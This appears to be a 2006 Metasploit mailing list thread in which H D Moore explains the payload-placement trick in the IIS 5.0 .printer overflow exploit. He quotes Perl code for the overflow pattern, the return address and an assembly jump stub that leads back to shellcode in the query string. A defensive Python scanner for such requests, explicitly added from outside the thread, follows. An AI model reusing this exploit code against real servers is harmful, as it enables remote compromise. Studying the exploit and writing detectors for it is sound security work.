Metasploit mailing list archives

iis50_printer_overflow


From: sonixxfx at gmail.com (Sonixxfx)
Date: Sat, 4 Mar 2006 08:44:56 +0100

It seems to me it would be good to do additional reading on this subject. I
have seen some interesting things under the links section on the Metasploit
website. Please let me know about other material I should read, especially
if it would be a good addition to Vinnie Liu's chapter.

Thanks.

Regards,

Ben


2006/3/3, Sonixxfx <sonixxfx at gmail.com>:

Thanks H D. I will take a look at this in the coming time, and I will let
you know how it goes. I have looked to see if I could find the URL I used when I
saw your picture, but I was unable to find it. Sorry.

Regards,

Ben




2006/3/2, H D Moore <hdm at metasploit.com>:

On Thursday 02 March 2006 14:49, Sonixxfx wrote:
I am trying to write an exploit for the "iis50_printer_overflow"
[ snip ]
The problem seems to be that I have little space available after the
return address for the payload. I believe there is something about 240
bytes available. So my question is how can I make use of both the space
available after the return address but also before the return address?


If you look at our exploit, we cheat. We stick our shellcode into the
query string and then find it again by dereferencing ebx+96 (which
happens to be a pointer, that when has 256+64 added to it, leads back
into our shellcode):

my $pattern = $self->MakeNops(280);
substr($pattern, 268, 4, pack("V", $target->[1]));

# payload is at: [ebx + 96] + 256 + 64
$pattern .= "\x8b\x4b\x60";         # mov ecx, [ebx + 96]
$pattern .= "\x80\xc1\x40";         # add cl, 64
$pattern .= "\x80\xc5\x01";         # add ch, 1
$pattern .= "\xff\xe1";             # jmp ecx

my $request = "GET http://$pattern/null.printer?$shellcode...


B.t.w. Nice looking man this morning on your website Metasploit ;)
That lovely image appears if you browse the web site with a hostname that
doesn't appear to be 'metasploit.com' or one of our other domains. Let me
know what URL you used to access the web site - it could be a bug. The
purpose is to prevent people from hotlinking to images we host on our
server.

-HD
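A defender-side check for the request shape HD describes above (an absolute-form GET whose host part is about 280 bytes, a path ending in /null.printer, and the payload in the query string), written as an added example that is not from this thread or from Metasploit. The two sample request lines are constructed, and the 253-character DNS name limit is the threshold chosen here.

```python
import re

# Constructed sample request lines (not traffic from the thread): a benign
# IPP request and one shaped like "GET http://<pattern>/null.printer?<shellcode>".
BENIGN_LINE = "GET http://printer.example.test/null.printer?job=1 HTTP/1.0"
SUSPECT_LINE = ("GET http://" + "A" * 268 + "BBBB" + "C" * 8
                + "/null.printer?" + "D" * 200 + " HTTP/1.0")

# Request line: METHOD SP target [SP HTTP/x.y]; the version is optional so
# HTTP/0.9-style lines still parse.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")

# A textual DNS name is at most 253 characters, so a longer host part can
# never be a legitimate name; the pattern in the thread is 280 bytes.
MAX_HOSTNAME = 253

def split_absolute_target(target):
    """Split an absolute-form target into (host, path, query) by hand, since
    urllib would reject the raw bytes an overflow host part contains.
    Returns None for origin-form targets such as "/null.printer"."""
    if not target.lower().startswith("http://"):
        return None
    rest = target[len("http://"):]
    host, _, path_and_query = rest.partition("/")
    path, _, query = path_and_query.partition("?")
    return host, "/" + path, query

def inspect_request_line(line):
    """Return the reasons a request line matches the overflow pattern,
    or an empty list when nothing looks wrong."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ["unparseable request line"]
    parts = split_absolute_target(m.group("target"))
    if parts is None:
        return []  # origin-form request: the host lives in the Host header instead
    host, path, query = parts
    reasons = []
    if len(host) > MAX_HOSTNAME:
        reasons.append(f"host part is {len(host)} bytes, above the {MAX_HOSTNAME}-byte DNS limit")
        if path.lower().endswith(".printer"):
            reasons.append("overlong host targets the .printer ISAPI extension")
        if query:
            reasons.append(f"query string carries {len(query)} bytes of opaque data")
    return reasons

def scan(lines):
    """Map each flagged request line to its list of reasons."""
    flagged = {}
    for line in lines:
        reasons = inspect_request_line(line)
        if reasons:
            flagged[line] = reasons
    return flagged
```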




